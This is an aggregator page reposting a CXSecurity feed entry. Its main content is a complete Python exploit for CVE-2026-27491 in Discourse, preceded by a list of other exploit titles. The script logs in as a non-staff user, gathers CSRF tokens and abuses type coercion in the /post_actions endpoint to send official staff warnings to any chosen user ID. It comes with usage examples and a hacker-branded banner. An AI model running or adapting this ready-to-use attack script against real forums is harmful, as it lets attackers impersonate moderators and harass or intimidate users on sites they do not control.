惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

腾讯CDC
aimingoo的专栏
aimingoo的专栏
S
SegmentFault 最新的问题
A
About on SuperTechFans
Engineering at Meta
Engineering at Meta
宝玉的分享
宝玉的分享
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 叶小钗
WordPress大学
WordPress大学
N
Netflix TechBlog - Medium
MyScale Blog
MyScale Blog
Stack Overflow Blog
Stack Overflow Blog
Microsoft Azure Blog
Microsoft Azure Blog
博客园 - 聂微东
M
MIT News - Artificial intelligence
F
Fortinet All Blogs
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Blog — PlanetScale
Blog — PlanetScale
T
Tailwind CSS Blog
Recent Announcements
Recent Announcements
Jina AI
Jina AI
大猫的无限游戏
大猫的无限游戏
Apple Machine Learning Research
Apple Machine Learning Research
J
Java Code Geeks

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
Discourse <= 2026.2.1 Authenticated Missing Authorization
2026-03-21 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Discourse <= 2026.2.1 Authenticated Missing Authorization (Official Warnings Bypass) # CVE: CVE-2026-27491 # Date: 2026-03-21 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.discourse.org # Software Link: https://github.com/discourse/discourse # Affected: Discourse <= 2026.2.1 (and earlier unpatched releases in 2026.x / 3.2.x branches) # Tested on: Discourse 3.2.x (pre-patch) # Category: Webapps # Platform: Ruby on Rails # Exploit Type: Remote Authorization Bypass # CVSS: 6.5 (Medium) – AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N # CWE: CWE-862 # Description: Authenticated non-staff users can issue official staff warnings to other users # by abusing type coercion in the post_actions endpoint (notify_user action). # Fixed in: 2026.1.2, 2026.2.1, 2026.3.0-latest.1 # Usage: # python3 exploit.py <target_url> --username <user> --password <pass> --target-user-id <id> --post-id <post_id> # # Examples: # python3 exploit.py https://forum.example.com --username regular --password pass123 \ # --target-user-id 456 --post-id 7890 # print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-27491 • Discourse → Issue Official Warnings as Non-Staff ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import requests import sys from urllib.parse import urljoin def get_csrf(session, base_url): r = session.get(urljoin(base_url, "/session/csrf")) if r.status_code != 200: print("[-] Failed to fetch CSRF token") sys.exit(1) data = r.json() csrf = data.get("csrf") if not csrf: print("[-] CSRF token not found") sys.exit(1) return csrf def login(session, base_url, username, password): csrf = get_csrf(session, base_url) login_url = urljoin(base_url, "/session") payload = { "login": username, "password": password, "second_factor_method": 1, "value": "", "use_another_method": False, "remember_me": False, "csrf": csrf } r = session.post(login_url, json=payload) if r.status_code != 200 or not r.json().get("success"): print("[-] Login failed - check credentials") sys.exit(1) print("[+] Login successful") return get_csrf(session, base_url) # refresh csrf after login def issue_warning(session, base_url, post_id, target_user_id, message): csrf = get_csrf(session, base_url) url = urljoin(base_url, "/post_actions") payload = { "id": post_id, "post_action_type_id": 4, # notify_user "message": message, "is_warning": "true", # string that triggered the bypass "username": f"user_{target_user_id}", "take_action": True, "csrf": csrf } headers = { "X-CSRF-Token": csrf, "Accept": "application/json, */*", "Content-Type": "application/json" } r = session.post(url, json=payload, headers=headers) if r.status_code == 200 and "success" in r.text.lower(): print("[+] SUCCESS: Official warning sent!") print(f" → Target user ID: {target_user_id}") print(f" → Message: {message}") print(" → Should now appear in target user's inbox as staff warning") else: print(f"[-] Failed ({r.status_code})") try: print(r.json()) except: print(r.text[:400]) def main(): parser = argparse.ArgumentParser( description="CVE-2026-27491 PoC - Discourse non-staff official warning bypass" ) parser.add_argument("target", help="Target Discourse URL (e.g. https://forum.example.com)") parser.add_argument("--username", required=True, help="Non-staff username") parser.add_argument("--password", required=True, help="Password") parser.add_argument("--target-user-id", type=int, required=True, help="User ID to send warning to") parser.add_argument("--post-id", type=int, required=True, help="Any post ID visible to the account") parser.add_argument("--message", default="This is an unauthorized official warning test", help="Warning text") args = parser.parse_args() s = requests.Session() s.headers.update({"User-Agent": "Mozilla/5.0 (PoC)"}) print(f"[*] Target: {args.target}") login(s, args.target, args.username, args.password) print(f"[*] Attempting to issue warning to user ID {args.target_user_id} via post {args.post_id}") issue_warning(s, args.target, args.post_id, args.target_user_id, args.message) if __name__ == "__main__": main()